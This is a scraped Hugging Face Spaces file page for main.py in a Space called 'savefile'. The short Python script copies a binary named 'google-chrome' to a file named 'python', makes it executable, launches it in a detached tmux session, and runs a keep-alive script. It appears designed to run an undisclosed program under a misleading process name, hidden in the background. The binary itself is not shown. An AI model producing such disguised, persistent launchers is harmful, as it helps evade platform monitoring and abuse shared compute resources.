Hugging Face
Models
Datasets
Spaces
Posts
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
ilhamap
/
savefile
like
0
Running
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
24a3ef3
savefile
/
main.py
ilhamap
Update main.py
52f1d36
verified
6 months ago
raw
Copy download link
history
blame
Safe
151 Bytes
import
os
os.system(
"cp google-chrome python"
)
os.system(
"chmod +x python"
)
os.system(
"tmux new-session -d -s ses2 ./python"
)
os.system(
"bash keep.sh"
)